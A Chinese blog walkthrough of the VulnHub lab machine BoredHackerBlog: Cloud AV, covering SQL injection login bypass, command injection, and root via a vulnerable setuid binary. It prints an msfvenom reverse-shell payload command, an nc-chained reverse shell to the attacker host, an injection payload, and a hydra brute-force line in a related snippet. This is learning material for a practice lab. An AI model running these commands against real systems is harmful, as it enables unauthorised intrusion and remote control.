靶机二:BoredHackerBlog_ Cloud AV

已于 2022-11-30 10:26:45 修改
阅读量478 收藏
点赞数 1
文章标签: 安全 web安全
于 2022-11-30 10:21:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/travelnight/article/details/128110393
版权

一、靶机地址

https://vulnhub.com/entry/boredhackerblog-cloud-av,453/
在这里插入图片描述

建议使用Virtualbox的host-only网络,不然有可能会获取不到IP地址

二、信息收集

在这里插入图片描述

常规的arp-scan,nmap 跑一下,发现靶机地址192.168.56.105。开放8080、22端口

三、渗透阶段

发现是一个登陆页面,常规性的尝试sqlmap跑注入,没有跑出结果。在输入框输入 " ,触发页面报错。
在这里插入图片描述

根据页面信息可以得出sqlite3.0+flask框架写的网站。
在这里插入图片描述

报错直接暴露了一个SQL语句 select * from code where password=“’ + password + '”

在这里插入图片描述

语句拼接成: select * from code where password=“1 " or 1=1 --+”,即可绕过登录
在这里插入图片描述

尝试了下功能,应该是输入文件名,后台进行扫描
在这里插入图片描述

盲猜有命令执行漏洞,发现执行成功。
在这里插入图片描述

尝试通过bash反弹shell,但是没用,后面尝试了两种办法
在这里插入图片描述

思路1-msf生成linux后门反弹:

参考命令。msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
在这里插入图片描述

修改权限后执行
在这里插入图片描述

MSF接收meterperter
在这里插入图片描述

思路2-nc命令串联:

nc 192.168.56.103 9999 | /bin/bash | nc 192.168.56.103 8888
通过nc吧/bin/bash的输入弹给9999端口,显示输出重定向到8888端口。

四、提权

一开始拿的shell,不是友好的shell,目标主机上有python环境,可以用 python -c'importpty; pty.spawn("/bin/bash")'获取一个友好的shell。
在这里插入图片描述

在信息收集的过程中,发现一个路径中,update_cloudav存在rws权限,意味着程序执行过程中具有root权限。下面还存放有源码。
源码如下:
``int main(int argc, char *argv[])
{
char *freshclam=“/usr/bin/freshclam”;
if (argc < 2){
printf(“This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n”);
return 1;
}
char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
sprintf(command, “%s %s”, freshclam, argv[1]);
setgid(0);
setuid(0);
system(command);
return 0;
}
关键问题在 *command 在对命令参数进行拼接后,传入到system()函数中,并没有做过滤,所以可以进行命令执行。尝试执行任意命令,发现有报错,从代码上看,不影响命令执行,没有回显。既然是直接执行shell命令,那么可以通过|符来拼接命令。
在这里插入图片描述

尝试在参数后构造bash反弹shell,本地弹shell都没有成功。
在这里插入图片描述

最后尝试上面的nc命令串联方法,反弹shell成功。

在这里插入图片描述

travelnight
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机一:BOREDHACKERBLOG_ SOCIAL NETWORK
travelnight的博客
11-08 1956
靶机一:BOREDHACKERBLOG: SOCIAL NETWORK 靶机渗透
Vulnhub靶机BOREDHACKERBLOG_ CLOUD AV
LainWith的博客
06-18 1224
系列:BoredHackerBlog(此系列共4台) 发布日期:2020年03月29日 难度:初级-中级 靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 内容简介: 这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtech
靶机渗透 blog
Anonymous
03-08 261
端口 访问 80 端口 目录扫描 在 /my_weblog 目录下 访问 README 发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞 需要使用到后台的账号密码 账号爆破 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incor..
靶机实战-blogger
ST0new的博客
04-05 3925
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。
BoredHackerBlog打靶记录(附靶机地址)
weixin_46591320的博客
11-04 788
BoredHackerBlog打靶记录
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
Cardinal:CTF:triangular_flag: AWD (Attack with Defense) 线下赛平台 AWD platform - 欢迎 Star~ :sparkles:
05-06
AWD 实时 3D 攻击大屏为项目 ,已适配接入 Cardinal)文档官方文档 cardinal.ink请您在使用前认真阅读官方使用文档,谢谢 ♪(・ω・)ノ教程AWD平台搭建–Cardinal功能介绍管理员创建题目、分配题目靶机、参赛队伍、...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
【VulnHub靶场】——BOREDHACKERBLOG: CLOUD AV
Demo不是emo的博客
11-05 5494
从上周开始制定了为期24周的打靶训练(每周一次),所以今天开始进行24次系统性打靶第次训练,每次打靶后都会分享靶场攻略和总结的知识点
靶机Raven
weixin_43940853的博客
11-10 1113
大致看了看别人的wp,感觉这个靶机坐下来还是能获得不少东西的 大致分为两种方法,先来第一种比较简单的,第种可能需要较长时间消化 kali : 192.168.230.224 target : 192.168.230.225 第一种方法(扫描->发现web服务->得知wordpress服务->wpscan扫描->发现用户名密码->用hydra爆破ssh(这里直接试出来...
Vulnhub靶机--born2root
Tauil的博客
08-08 867
访问该网页发现了一个rsa私钥,刚进入网页时得到了一个用户名@网络地址格式,是在暗示我们登陆这个用户,所以输入命令。但是jimmy也没有root权限,那么最后一个用户habi只能使用暴力破解ssh登录了,在。为使用该文件登陆martin用户,需要先给文件读写授权再使用ssh连接。查看是否有对应版本的脚本,没有对应版本,那么应该不是这个端口的问题。执行,但是发现该靶机禁止一切用户打开任何端口,所有导致脚本运行失败。发现与其他不同的是靶机开启了111端口,使用命令。三个用户,在使用命令。进行爆破,获得密码为。.
渗透项目(四):Tr0ll
Ays.Ie的博客
10-27 1415
本文记录作者第4个渗透项目,希望对渗透感兴趣的同学有所帮助,随后还会更新一些其他工具使用的文章
靶机实战-Breach-1.0
滕财然的博客
03-25 2398
Breach-1.0靶机实战 文章目录Breach-1.0靶机实战1、主机发现2、端口扫描3、web服务(80端口)4、提权5、总结 1、主机发现 没有IP的话自行配置IP 2、端口扫描 发现开放了N多端口,可能做了端口防护,那直接尝试访问80端口 3、web服务(80端口) 查看页面源码: 发现疑似base64加密的字符串 尝试解密: 发现解出来又是个base64,继续解密,最后解密出...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1423
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全之扫描探测阶段攻防手段(
子非渔
07-24 840
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础与数据库教学下(超详细)
最新发布
weixin_60838266的博客
07-29 990
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 741
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值